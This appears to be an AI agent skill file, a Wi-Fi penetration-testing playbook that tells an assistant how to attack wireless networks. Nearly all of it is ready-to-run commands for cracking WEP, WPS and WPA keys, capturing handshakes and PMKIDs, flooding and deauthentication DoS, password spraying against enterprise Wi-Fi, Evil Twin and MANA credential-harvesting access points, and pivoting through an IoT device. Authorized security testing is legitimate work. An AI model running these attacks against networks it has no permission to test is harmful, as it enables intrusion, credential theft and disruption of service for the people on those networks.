Wi-Fi Pentesting Skill

A comprehensive skill for Wi-Fi security assessment and penetration testing. This skill guides you through wireless network reconnaissance, attack execution, and credential capture.

When to Use This Skill

Use this skill when the user asks about:

• Wi-Fi network security testing or assessment
• WEP, WPA, WPA2, WPA3 cracking or attacks
• WPS (Wi-Fi Protected Setup) attacks
• Evil Twin, KARMA, or MANA attacks
• Deauthentication or DoS attacks on Wi-Fi
• Handshake capture or PMKID extraction
• WPA Enterprise (802.1X) testing
• Wi-Fi Direct security testing
• IoT device Wi-Fi exploitation
• Wireless network reconnaissance

Prerequisites

Before starting any Wi-Fi pentest:

1. Hardware: Wi-Fi adapter that supports monitor mode and packet injection
2. OS: Kali Linux or similar penetration testing distribution
3. Permissions: Root/sudo access required for most operations
4. Legal: Ensure you have explicit authorization to test the target network

Quick Reference Commands

Interface Management

# List available interfaces
ip link show
iwconfig

# Kill interfering processes
airmon-ng check kill

# Enable monitor mode
airmon-ng start wlan0
iwconfig wlan0 mode monitor

# Disable monitor mode (return to managed)
airmon-ng stop wlan0mon
iwconfig wlan0mon mode managed

Network Scanning

# Basic scan (2.4GHz default)
airodump-ng wlan0mon

# Scan 5GHz band
airodump-ng wlan0mon --band a

# Scan for WPS-enabled networks
airodump-ng wlan0mon --wps

# Scan with iw (alternative)
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA"
iwlist wlan0 scan

Attack Categories

1. Reconnaissance

Start with passive scanning to identify targets:

# Capture traffic on specific BSSID and channel
airodump-ng --bssid <BSSID> --channel <CH> --write capture wlan0mon

# Filter for WPS-enabled networks
airodump-ng wlan0mon --wps

# Identify authentication types (WPA-PSK, WPA-MGT/Enterprise)
# Look for "WPA2 CCMP MGT" in airodump output for Enterprise

2. WEP Attacks

WEP is trivially broken. Use this workflow:

# Step 1: Capture IVs
airodump-ng --bssid <BSSID> --channel <CH> --write wep_capture wlan0mon

# Step 2: Accelerate IV collection with ARP replay (optional)
# Requires a connected client MAC
aireplay-ng --arpreplay -b <BSSID> -h <CLIENT_MAC> wlan0mon

# Step 3: Crack once enough IVs collected (typically 50k+)
aircrack-ng wep_capture-01.cap

Why WEP fails: RC4 uses 24-bit IVs that repeat quickly. Same IV + same key = same keystream. XORing ciphertexts reveals plaintext. PTW attack reduces requirements to tens of thousands of packets.

3. WPS Attacks

WPS uses an 8-digit PIN with only ~11,000 effective combinations.

WPS Bruteforce

# Using Reaver
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -f -N -vv

# Using Bully (faster, fewer dependencies)
bully wlan0mon -b <BSSID> -c <CHANNEL> -S -F -B -v 3

Pixie Dust Attack (Offline)

Exploits weak nonce generation in some APs:

# Reaver with Pixie Dust
reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -K 1 -N -vv

# Bully with Pixie Dust
bully wlan0mon -b <BSSID> -c <CHANNEL> -d -v 3

# OneShot-C (no monitor mode required)
./oneshot -i wlan0 -K -b <BSSID>

Null PIN Attack

Some poorly configured APs accept empty PIN:

reaver -i wlan0mon -b <BSSID> -c <CHANNEL> -f -N -g 1 -vv -p ''

After obtaining WPS PIN: The PIN reveals the WPA/WPA2 PSK, granting persistent network access.

4. WPA/WPA2 PSK Attacks

PMKID Attack (Clientless)

Capture PMKID from AP without needing connected clients:

# Install hcxdumptool
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool && make && make install

# Capture PMKID
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

# Alternative with eaphammer
./eaphammer --pmkid --interface wlan0 --channel <CH> --bssid <BSSID>

# Convert to hashcat format
hcxpcaptool -z hashes.txt /tmp/attack.pcapng

# Crack with hashcat
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt

# Or with John the Ripper
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Valid PMKID format: 4 parts, e.g.,

4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838

Handshake Capture

Traditional method requiring a connected client:

# Step 1: Monitor target network
airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID> -w /tmp/psk --output-format pcap

# Step 2: Force reconnection with deauth
aireplay-ng -0 0 -a <BSSID> -c <CLIENT_MAC> wlan0mon
# Or broadcast deauth (may not work)
# aireplay-ng -0 0 -a <BSSID> wlan0mon

# Step 3: Verify handshake captured
# Look for "WPA Handshake" in airodump-ng output

# Step 4: Crack
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b <BSSID> /tmp/psk*.cap

Verify Handshake in Capture

# aircrack-ng
aircrack-ng psk-01.cap

# tshark
tshark -r psk-01.cap -n -Y eapol

# cowpatty
cowpatty -r psk-01.cap -s "ESSID" -f -

# pyrit
pyrit -r psk-01.cap analyze

5. WPA Enterprise (802.1X) Attacks

Enterprise networks use RADIUS authentication with various EAP methods.

Username Capture

EAP-Identity messages often contain usernames in cleartext:

# Capture EAP traffic
airodump-ng wlan0mon -c <CHANNEL> --bssid <BSSID>

# In another terminal, filter with Wireshark
tcpdump -i wlan0mon -w eap_capture.pcap eapol

# Filter in Wireshark: eap.code == 2 && eap.type == 1
# Look for "Response, Identity" packets

EAP Bruteforce (Password Spray)

# Using air-hammer
./air-hammer.py -i wlan0 -e <ESSID> -P <PASSWORD> -u usernames.txt

# Using eaphammer
./eaphammer --eap-spray \
    --interface-pool wlan0 wlan1 wlan2 \
    --essid <ESSID> \
    --password <PASSWORD> \
    --user-list users.txt

SIM-based EAP (IMSI Leakage)

EAP-SIM/EAP-AKA can leak IMSI in cleartext:

# Enable monitor mode
airmon-ng start wlan0

# Capture EAP frames
tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap

# Filter: eap.code == 2 && eap.type == 1
# Look for NAI format: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org

6. Evil Twin Attacks

Evil Twin exploits client preference for stronger signals and known networks.

Open Evil Twin

# Basic with airbase-ng
airbase-ng -a <FAKE_MAC> --essid "<TARGET_ESSID>" -c <CHANNEL> wlan0mon

# With eaphammer (interface NOT in monitor mode)
./eaphammer -i wlan0 --essid <ESSID> --captive-portal

WPA/WPA2 Evil Twin

Requires knowing the password:

./eaphammer -i wlan0 -e <ESSID> -c <CHANNEL> --creds --auth wpa-psk --wpa-passphrase "<PASSWORD>"

Enterprise Evil Twin

# Generate certificates
./eaphammer --cert-wizard

# Launch attack
./eaphammer -i wlan0 --channel <CH> --auth wpa-eap --essid <ESSID> --creds

# With downgrade attacks
./eaphammer --negotiate gtc-downgrade
# or
./eaphammer --negotiate weakest

Authentication method priority (default): GTC, MSCHAPV2, TTLS-MSCHAPV2, TTLS, TTLS-CHAP, TTLS-PAP, TTLS-MSCHAP, MD5

7. KARMA, MANA, Known Beacon Attacks

KARMA Attack

Responds to all probe requests:

./eaphammer -i wlan0 --cloaking full --captive-portal

MANA Attack

Learns PNL from directed probes, responds to broadcast probes:

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal]

Loud MANA

Broadcasts all observed SSIDs to increase hit rate:

./eaphammer -i wlan0 --cloaking full --mana --loud [--captive-portal]

Known Beacon Attack

Cycles through wordlist of SSIDs:

./eaphammer -i wlan0 --mana --loud --known-beacons --known-ssids-file wordlist.txt

Known Beacon Burst

Rapid-fire beacon transmission:

./forge-beacons -i wlan0 \
    --bssid de:ad:be:ef:13:37 \
    --known-essids-file known-s.txt \
    --dst-addr 11:22:33:11:22:33 \
    --burst-count 5

8. DoS Attacks

Deauthentication

# aireplay-ng
aireplay-ng -0 <COUNT> -a <BSSID> -c <CLIENT_MAC> wlan0mon
# -0 0 = continuous deauth
# Omit -c for broadcast deauth

# mdk4
mdk4 wlan0mon d -c <CHANNEL> -b <CLIENT_MAC> -E <ESSID> -B <BSSID>

Beacon Flooding (mdk4)

Creates fake APs, may crash scanners:

mdk4 wlan0mon b -a -w nta -m
# -a = non-printable chars, break 32-byte limit
# -w n = Open, t = WPA/TKIP, a = WPA2/AES
# -m = use real BSSIDs

Authentication DoS (mdk4)

Overloads AP with auth frames:

mdk4 wlan0mon a -a <BSSID> -m
# or capture and repeat from authenticated clients
mdk4 wlan0mon a -i <BSSID> -m

TKIP Michael Countermeasures (mdk4)

Triggers 1-minute AP shutdown on TKIP APs:

mdk4 wlan0mon m -t <BSSID> [-j]
# -j = intelligent replay

EAPOL Flooding (mdk4)

Creates fake sessions or disconnects clients:

mdk4 wlan0mon e -t <BSSID> [-l]
# -l = use Logoff messages to kick clients

9. Wi-Fi Direct Attacks

EvilDirect Hijacking

Impersonate Wi-Fi Direct group owner:

airbase-ng -a <FAKE_MAC> --essid <DIRECT_ESSID> -c <CHANNEL> wlan0mon

10. IoT Pivoting (Shelly Gen4 Example)

Some IoT devices keep commissioning AP active:

# 1. Connect to provisioning AP (e.g., Shelly-XXXX)
# 2. Access HTTP API
http://192.168.33.1/relay/0?turn=on

# 3. Pivot to internal network via device
# Use Shelly scripting to make HTTP requests from internal interface
Shelly.addEventHandler(function (event) {
    if (event.component === "switch:0" && event.info.state) {
        Shelly.call("HTTP.GET", { url: "http://10.0.98.221/light/0?turn=on" });
    }
});

Tools Installation

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./kali-setup

Airgeddon

# Install dependencies
mv $(which dhcpd) $(which dhcpd).old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

# Run with Docker (alternative)
docker run --rm -ti --name airgeddon --net=host --privileged \
    -p 3000:3000 -v /tmp:/io \
    -e DISPLAY=$(env | grep DISPLAY | awk -F '=' '{print $2}') \
    v1s1t0r1sh3r3/airgeddon

Wifiphisher

git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install

Wifite2

Automates WPS/WEP/WPA-PSK attacks:

git clone https://github.com/derv82/wifite2.git
cd wifite2
sudo python setup.py install

# Run
sudo wifite2 --interface wlan0mon

Best Practices

1. Always verify authorization before testing any network
2. Document findings including BSSID, channel, encryption type, vulnerabilities
3. Use wordlists like rockyou.txt for password cracking
4. Combine attacks - deauth + handshake capture, MANA + captive portal
5. Test multiple methods - PMKID may work when handshake capture fails
6. Consider PMF/802.11w - WPA3 networks may block spoofed deauth frames
7. Check for client isolation on open/OWE networks before assuming L2 access

Common Issues

• Monitor mode fails: Some adapters don't support it. Try different hardware.
• Deauth not working: Target may have PMF/802.11w enabled (WPA3).
• Handshake not capturing: May need to wait for client to reconnect, or use PMKID instead.
• WPS timeout: AP may block MAC addresses. Use MAC rotation or try Pixie Dust.
• Evil Twin not connecting: Client may prefer stronger signal or validate certificates.

References

• EAPHammer Wiki
• Wifiphisher
• Wifite2
• hcxdumptool
• SpecterOps Modern Wireless Attacks Series
• Synacktiv Wi-Fi Pentesting 2025